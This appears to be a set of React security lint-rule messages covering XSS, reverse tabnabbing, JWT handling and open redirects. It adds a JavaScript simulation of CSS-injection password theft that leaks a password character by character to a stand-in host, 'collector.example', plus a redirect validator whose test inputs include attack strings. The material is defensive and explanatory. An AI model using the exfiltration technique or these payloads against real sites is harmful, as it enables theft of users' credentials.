React security best practices
Detected setting HTML from code. This is risky because it is easy to inadvertently expose your users to a cross-site scripting (XSS) attack, which lets an attacker run script in their session and access sensitive information. Instead, render the content without dangerouslySetInnerHTML, or pass it through DOMPurify to sanitize the HTML before it is set.
Overriding `transformLinkUri` or `transformImageUri` with an insecure implementation, or turning `allowDangerousHtml` on, opens the rendered Markdown up to XSS vectors (for example `javascript:` link targets that the default transformer would have stripped, or raw HTML passed through unsanitized).
A controlled password input (its value bound to component state) is mirrored by React into the DOM value attribute, so the password can be leaked if a CSS injection exists on the page: attribute selectors such as input[value^="a"] paired with background-image URLs turn each matching prefix into a request to the attacker's host, one character per round. Keep password fields uncontrolled and read them through a ref on submit, so the secret never lands in an attribute that CSS can see.
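The leak described above, as an added example that is not part of the original rule set: a small simulation of the attribute-selector matching a browser would do against an injected stylesheet, run once against a controlled field (value mirrored into the attribute) and once against an uncontrolled one. The collector host, charset and sample password are constructed values; the matcher stands in for the browser's selector engine.

```javascript
// Added example (not from the original rule set): simulate the CSS-injection leak
// against a controlled React password field. React mirrors a controlled
// <input value={...}> into the DOM `value` attribute, and CSS attribute selectors
// can test that attribute, so an injected stylesheet leaks the secret one character
// per round. The matcher below stands in for the browser's selector engine; the
// collector host is a constructed, attacker-controlled name.

const CHARSET = 'abcdefghijklmnopqrstuvwxyz0123456789';
const COLLECTOR = 'https://collector.example'; // assumption: attacker's server

// One CSS rule per candidate next character. In a real injection each rule is
// `input[type="password"][value^="<prefix>"] { background-image: url(<url>) }`.
function exfilStylesheet(knownPrefix, collector = COLLECTOR) {
  return [...CHARSET].map((ch) => {
    const prefix = knownPrefix + ch;
    return {
      selector: `input[type="password"][value^="${prefix}"]`,
      prefix,
      url: `${collector}/leak/${encodeURIComponent(prefix)}`,
    };
  });
}

// Selector matching for the two attribute tests used above. `el.attributes` holds the
// content attributes of a DOM-like element. An uncontrolled input keeps the typed text
// only in its `.value` property, which CSS cannot see, so it has no `value` attribute.
function selectorMatches(rule, el) {
  const { type, value } = el.attributes;
  return type === 'password' && typeof value === 'string' && value.startsWith(rule.prefix);
}

// URL the browser would fetch for this element under the injected rules (null: no leak).
function leakedRequest(rules, el) {
  const hit = rules.find((rule) => selectorMatches(rule, el));
  return hit ? hit.url : null;
}

// Run the attack to completion: each round injects a stylesheet for the prefix
// learned so far and reads back which request arrived at the collector.
function recoverPassword(el, maxLen = 64) {
  let prefix = '';
  while (prefix.length < maxLen) {
    const hit = exfilStylesheet(prefix).find((rule) => selectorMatches(rule, el));
    if (!hit) break; // nothing matched: end of password, or a character outside CHARSET
    prefix = hit.prefix;
  }
  return prefix;
}

// Constructed elements. The controlled field is what <input type="password" value={pw}>
// produces in the DOM; the uncontrolled one is <input type="password" ref={pwRef}>
// after the user has typed the same password.
const controlledField = { attributes: { type: 'password', value: 'hunter2' } };
const uncontrolledField = { attributes: { type: 'password' } };

if (typeof require !== 'undefined' && require.main === module) {
  console.log('controlled   ->', JSON.stringify(recoverPassword(controlledField)));   // "hunter2"
  console.log('uncontrolled ->', JSON.stringify(recoverPassword(uncontrolledField))); // ""
}
```

The simulation only models the attribute test; a real attack also needs a CSS injection point and a way to re-inject per round, but that is exactly the precondition the rule names. The fix is to keep the field uncontrolled: `<input type="password" ref={pwRef} />` and `pwRef.current.value` on submit, which keeps the secret in the property and out of the attribute.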
This HTML element '$EL' and attribute '$ATTR' together may load an external resource. If dynamic content can reach this attribute, an attacker may be able to make the browser send HTTP requests to unintended locations, which may leak data about your users (for example through the Referer header or the fact that they opened the page). If this element reaches out to a known host, consider hardcoding the host (or loading it from configuration) and appending only the dynamic path. See https://github.com/cure53/HTTPLeaks for more information.
Unencrypted request over HTTP detected. Use an https:// URL so the request and response cannot be read or modified in transit.
User-controlled data interpolated into a styled component's CSS is an anti-pattern that can lead to CSS injection and XSS vulnerabilities.
User-controlled data passed to insertAdjacentHTML, document.write or document.writeln is an anti-pattern that can lead to XSS vulnerabilities; these sinks parse their argument as HTML.
User-controlled data in `$X` is an anti-pattern that can lead to XSS vulnerabilities.
This anchor tag with 'target="_blank"' is missing 'rel="noreferrer"'. A page opened with 'target="_blank"' receives a reference to the opening page as its 'window.opener' and can use it to navigate the origin page (for example by setting 'window.opener.location') to a malicious URL. This is called reverse tabnabbing. To prevent it, include 'rel="noreferrer"' on the tag: 'noreferrer' implies 'noopener' and additionally suppresses the Referer header. Current browsers treat 'target="_blank"' on anchors as implying 'noopener', but the explicit attribute still protects users of older browsers.
Injecting props into a new React element (for example by spreading an object into createElement or JSX) may introduce an XSS vulnerability if those props can contain a user-controllable object, such as a `dangerouslySetInnerHTML` expression.
Copying props into state is a bad practice: it stops the data flow in rendering, so the component keeps showing the copied value after the parent passes a new prop.
A property decoded from a JWT without verifying its signature cannot be trusted; anyone can assemble a token with arbitrary claims. Verify the signature (pinning the expected algorithm) and the expiry before reading any claim.
Storing JWT tokens in localStorage is a known bad practice: any script running on the page, including an injected XSS payload, can read them. Consider moving your tokens from localStorage to an HttpOnly cookie, which script cannot read.
User-controlled data in <Redirect /> can lead to unvalidated (open) redirects: an attacker can send users from your site to a URL of their choosing. Validate that the target is a path on your own origin before redirecting.
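One helper that serves both the external-resource rule (hardcode the host, append only the dynamic path) and the <Redirect /> rule, as an added example that is not part of the original rule set. It resolves untrusted input with the WHATWG URL parser and accepts it only if it stays on a fixed origin, which is what defeats protocol-relative, scheme-switching and backslash tricks that string prefix checks miss. APP_ORIGIN and ASSET_ORIGIN are assumed sample values.

```javascript
// Added example (not from the original rule set): pin the origin and let user input
// pick only the path. Serves both the "element may load an external resource" rule
// and the <Redirect /> rule. APP_ORIGIN and ASSET_ORIGIN are assumed sample values.
const APP_ORIGIN = 'https://app.example.com';   // where <Redirect /> may send users
const ASSET_ORIGIN = 'https://cdn.example.com'; // the known host for img/script/iframe src

// Resolve `candidate` against `origin` with the WHATWG URL parser and accept it only if
// it stays on that origin. Parsing, rather than string prefix checks, is what catches
// "//evil.example/x", "https://evil.example", "javascript:..." and "/\evil.example"
// (a backslash counts as a slash for http(s) URLs). Returns the absolute href or null.
function sameOriginUrl(origin, candidate) {
  if (typeof candidate !== 'string') return null;
  let url;
  try {
    url = new URL(candidate, origin);
  } catch {
    return null;
  }
  return url.origin === origin ? url.href : null;
}

// Redirect target for <Redirect to={safeRedirectTarget(params.next)} />: a same-origin
// path, or the fallback. Returning a relative path keeps the router on this app.
function safeRedirectTarget(next, fallback = '/') {
  const href = sameOriginUrl(APP_ORIGIN, next);
  if (href === null) return fallback;
  const url = new URL(href);
  return url.pathname + url.search + url.hash;
}

// src for an <img>/<script> on the known host: the host is fixed in code and the dynamic
// part is reduced to encoded path segments, so it can neither change the host nor add
// a query string nor traverse upward.
function assetUrl(dynamicPath) {
  const segments = String(dynamicPath)
    .split('/')
    .filter((seg) => seg !== '' && seg !== '.' && seg !== '..')
    .map(encodeURIComponent);
  return `${ASSET_ORIGIN}/${segments.join('/')}`;
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(safeRedirectTarget('/dashboard?tab=1'));     // /dashboard?tab=1
  console.log(safeRedirectTarget('//evil.example/login')); // /
  console.log(assetUrl('avatars/../../etc/passwd'));       // https://cdn.example.com/avatars/etc/passwd
}
```

Use `safeRedirectTarget` on the `next`/`returnTo` parameter before it reaches <Redirect /> and `assetUrl` wherever a user-chosen identifier selects an image or script on a known host; in both cases the only thing the attacker can still choose is which same-origin path is requested, not where the request goes.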